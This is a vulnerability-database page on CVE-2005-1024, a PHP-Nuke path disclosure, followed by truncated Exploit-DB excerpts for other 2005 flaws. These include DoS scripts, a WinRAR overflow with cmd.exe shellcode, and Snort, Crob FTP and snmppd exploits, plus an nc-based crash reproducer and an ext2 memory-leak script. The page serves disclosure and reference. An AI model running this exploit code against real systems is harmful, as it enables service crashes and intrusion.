CVE-2005-1024
Published: 2005-05-02
Priority: P4 · medium · CVSS 2.0: 5
Vector: AV:N/AC:L/Au:N/C:P/I:N/A:N
EPSS: 1.73% (74.7th percentile)
modules.php in PHP-Nuke 6.x to 7.6 allows remote attackers to obtain sensitive information via a direct request to (1) my_headlines, (2) userinfo, or (3) search, which reveals the path in a PHP error message.
Affected: 18 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| francisco_burzi | php-nuke | — | — |
(All 18 listed ranges name the same vendor and product; the version-range and fixed-in fields are empty for every entry.)
No detection rules found.
Exploit-DB
CVE-2005-3294 [MEDIUM] TYPSoft FTP Server 1.10 - 'RETR' Denial of Service (2)
exploitdb · 2010-12-29 · CVSS 5.0
---
#!/usr/bin/python
#
# TYPSoft FTP Server (v 1.10) RETR CMD Denial Of Service
#
# CVE-2005-3294
# OSVDB 19992
#
# 12/23/2010
# (C) Emanuele Gentili
#
# Notes:
# I wrote this exploit because the code published at (1) does not work correctly.
# (1) http://www.exploit-db.com/exploits/12604/
#
import socket
import sys
user="test"
pwd="test"
buffer="\x41"
print("\n TYPSoft FTP Server (V 1.10) RETR CMD Denial Of Service\n")
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("192.168.0.109",21))
data = s.recv(1024)
print("[+] Sending user login...")
s.send("USER " + user + '\r\n')
data = s.recv(1024)
s.send("PASS " + pwd + '\r\n')
data = s.recv(1024)
print("[+] Sending first exploit stage...")
s.send("RETR " + buffe
Exploit-DB
CVE-2005-4620 WinRAR 3.30 - 'Filename' Local Buffer Overflow (1)
exploitdb · 2006-01-04
---
/* WinRAR Buffer Overflow 3.30 Exploit
*
* Bug found by: Vredited By Alpha Programmer & Trap-Set U.H Team
* Exploit made by: K4P0
* Contact: [email protected]
*/
#include <stdio.h>  /* header names were lost in extraction; restored from the functions used (printf, memset) */
#include <string.h>
int main(void)
{
char EvilBuff[1024];
// Normal cmd.exe shellcode.
char shellcode[] = "\x55\x8B\xEC\x33\xFF\x57\x83\xEC\x04\xC6\x45\xF8\x63"
"\xC6\x45\xF9\x6D\xC6\x45\xFA\x64\xC6\x45\xFB\x2E\xC6"
"\x45\xFC\x65\xC6\x45\xFD\x78\xC6\x45\xFE\x65\x8D\x45"
"\xF8\x50\xBB\x44\x80\xBF\x77\xFF\xD3";
char jmpesp_offset[] = "\x0F\x98\xF8\x77";
char Prog[1024] = "WinRAR ";
printf("WinRAR Buffer Overflow 3.30 Exploit\n\n");
printf("Bug discovered by: Vredited By Alpha Programmer & Trap-Set U.H Team\n");
printf("Exploit made by: K4P0\n");
memset(EvilBuff, 0x00,
Exploit-DB
CVE-2005-3252 Snort 2.4.2 - Back Orifice Parsing Remote Buffer Overflow
exploitdb · 2005-10-25
---
/*
* THCsnortbo 0.3 - Snort BackOrifice PING exploit
* by [email protected]
* THC PUBLIC SOURCE MATERIALS
*
* Bug was found by Internet Security Systems
* http://xforce.iss.net/xforce/alerts/id/207
*
* v0.3 - removed/cleaned up info for public release
* v0.2 - details added, minor changes
* v0.1 - first release
*
* Greetz to all guests at THC's 10th
* Anniversary (TAX) :>
*
* $Id: THCsnortbo.c,v 1.1 2005/10/24 11:38:59 thccvs Exp $
*
*/
/*
* DETAILS
*
* The bug is in spp_bo.c, BoGetDirection() function
* static int BoGetDirection(Packet *p, char *pkt_data) {
* u_int32_t len = 0;
* u_int32_t id = 0;
* u_int32_t l, i;
* char type;
* char buf1[1024];
*
* ...
* buf_ptr = buf1;
* ...
* while ( i buf1 size.
*
* The exchange of data betwee
Exploit-DB
CVE-2005-1873 Crob FTP Server 3.6.1 - Remote Stack Overflow
exploitdb · 2005-06-03
---
/*
* CrobFTP remote stack overflow PoC
* ---------------------------------
* Tested on Crob FTP Server 3.6.1, Windows XP
*
* Coded by Leon Juranic
* LSS Security / http://security.lss.hr
*
*/
#include <stdio.h>     /* header names were lost in extraction; restored from the functions used */
#include <string.h>
#include <winsock2.h>  /* select/recv/FD_* on Windows; matches the ws2_32 pragma below */
#pragma comment (lib,"ws2_32")
char *fzz_recv (int sock)
{
fd_set fds;
struct timeval tv;
static char buf[10000];
char *ptr=buf;
int n;
tv.tv_sec = 5;
tv.tv_usec = 0;
FD_ZERO(&fds);
FD_SET(sock,&fds);
if (select(NULL,&fds,NULL,NULL,&tv) != 0) {
if (FD_ISSET (sock,&fds)) n=recv (sock,ptr,sizeof(buf),0);
buf[n-1] = '\0';
printf ("RECV: %s\n",buf);
return buf;
}
else {
return NULL;
}
}
int login (int sock, char *user, char *pass)
{
char buf[1024], *bla;
bla=fzz_recv(sock);
printf ("recv: %s\n",bla);
sprintf (buf,"USER
Exploit-DB
CVE-2005-1246 Snmppd - SNMP Proxy Daemon Remote Format String
exploitdb · 2005-04-29
---
/*
* Snmppd SNMP proxy daemon format string exploit
*
* cybertronic[at]gmx[dot]net
*
* 04/29/2005
*
* buffer space is 1024 bytes ( MAX_SNMPPD_OID_LEN defined in snmppd-0.4.5/snmppd.h )
*
* Apr 29 16:01:31 ctronic snmppd[6274]: fd 5: Request: XAAAA_804a81e.bfffb9d4.0.0.0.0.35206466.6552203a.73657571.58203a74.41414141
*
* This is annoying... there is no fixed input storage.
* The buffer's location sometimes varies by 0x980 bytes.
* Below is a short dump. I hijacked the GOT entry
* of strdup. Maybe there are some fixed pointers for
* reliable exploitation. Drop me an email if you have
* any suggestions.
*
*
* __strdup
*
* 0xbfffb450: 0x906e6824 0x90909090 0x90909090 0x90909090
* 0xbfffb460: 0x90909090 0x90909090 0x90909090 0x90909090
* 0xbff
Exploit-DB
CVE-2005-0575 KNet Web Server 1.04c - Buffer Overflow (Denial of Service) (PoC)
exploitdb · 2005-02-25
---
/*
-=[--------------------ADVISORY-------------------]=-
-=[
]=-
-=[ Knet
*/
#include <stdio.h>       /* header names were lost in extraction; restored from the functions used */
#include <stdlib.h>
#include <string.h>
#include <sys/socket.h>  /* socket, connect, send */
#include <netinet/in.h>  /* struct sockaddr_in */
#include <netdb.h>       /* struct hostent */
void help(char *program_name);
int main(int argc, char *argv[]) {
struct sockaddr_in trg;
struct hostent *he;
long addr;
int sockfd, buff,rc;
char evilbuf[1024];
char buffer[1024];
char *request;
if(argc h_addr);
memset(&(trg.sin_zero), '\0', 8);
printf("\n\nConnecting to target \t...");
rc=connect(sockfd, (struct sockaddr *)&trg, sizeof(struct sockaddr_in));
if(rc==0)
{
printf("[Done]\nBuilding evil buffer\t...");
memset(evilbuf,90,1023);
printf("[Done]\nSending evil request \t...");
sprintf(request,"GET %s \n\r\n\r",evilbuf);
send(sockfd,request,strlen(request),0);
printf("[Done]\n\n
Exploit-DB
CVE-2005-0636 Foxmail 2.0 - 'MAIL FROM:' Denial of Service
exploitdb · 2005-02-07
---
#!/usr/bin/python
#Code by OYXin
#oyxin_at_segfault.cn
import socket
import sys
import getopt
def usage():
print "Usage: foxserver.py -h host -p port"
sys.exit(0)
if __name__ == '__main__':
try:
opts, args = getopt.getopt(sys.argv[1:], "h:p:")
except getopt.GetoptError, msg:
print msg
usage()
for o,a in opts:
if o in ["-h"]:
host = a
if o in ["-p"]:
port = int(a)
evilbuf = "MAIL-FROM: " + "\r\n"
evilbuf += "RCPT-TO: [email protected]" + "\r\n"
evilbuf += "Message-ID: 123" + "\r\n"
evilbuf += "ASDF" + "\r\n"
evilbuf += "." + "\r\n"
evilbuf += "QUIT" + "\r\n"
try:
sockfd = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sockfd.connect((host, port))
recvbuf = sockfd.recv(1024)
print `recvbuf`
sockfd.send("HELO localhost\r\n"
Exploit-DB
CVE-2005-0101 Newspost 2.0/2.1 - Remote Buffer Overflow
exploitdb · 2005-02-01
---
source: https://www.securityfocus.com/bid/12418/info
Newspost is prone to a remote buffer overflow vulnerability due to an unbounded memory copy operation.
The problem occurs in the 'socket_getline()' function of 'socket.c' when the vulnerable client handles NNTP server responses.
Successful exploitation of this issue could potentially lead to arbitrary code execution.
This issue was reported to affect Newspost 2.1.1 and prior, however, other versions may be vulnerable.
Create a server:
perl -e 'print "A" x 1024;print "BBBBCCCCDDDDEEEE"'| nc -v -l -p 119
Connect to it:
newspost -s test -i localhost -f [email protected] -n news.news /etc/hosts
Bugzilla
CVE-2005-0400 [LOW] ext2 mkdir() directory entry random kernel memory leak
bugzilla · 2005-03-29 · CVSS 2.1
A flaw was discovered in ext2 filesystem support affecting 2.4 and 2.6 kernels.
When a new directory is created, the ext2 block written to disk is not initialized,
leading to an information leak.
The following script can easily show the problem on Linux 2.4 and 2.6:
#!/bin/sh
FILE=foo
dd if=/dev/zero of=$FILE bs=1k count=8192
mke2fs -F -b 1024 -m0 $FILE
mount -o loop $FILE mnt
for D in `seq 500` ; do mkdir mnt/$D ; done
umount mnt
Using 'strings foo' will reveal the information leak in the file.
Patch committed upstream, see:
fixed=2.6-bk (20050325): http://linux.bkbits.net:8080/linux-2.6/cset@4244bfc9vHVlT4nv2o4ys4_sf6vzKA
fixed=2.4-bk (20050325): http://linux.bkbits.net:8080/linux-2.4/cset@424473284plfEOB185qmyHPQyNPq4Q
Bugzilla
CVE-2005-0400 [LOW] ext2 mkdir() directory entry random kernel memory leak (ipf)
bugzilla · 2005-03-29 · CVSS 2.1
References
http://marc.info/?l=bugtraq&m=111263454308478&w=2
http://www.securityreason.com/adv/PHPNuke%206.x-7.6-p1.txt
https://exchange.xforce.ibmcloud.com/vulnerabilities/19953
https://exchange.xforce.ibmcloud.com/vulnerabilities/44980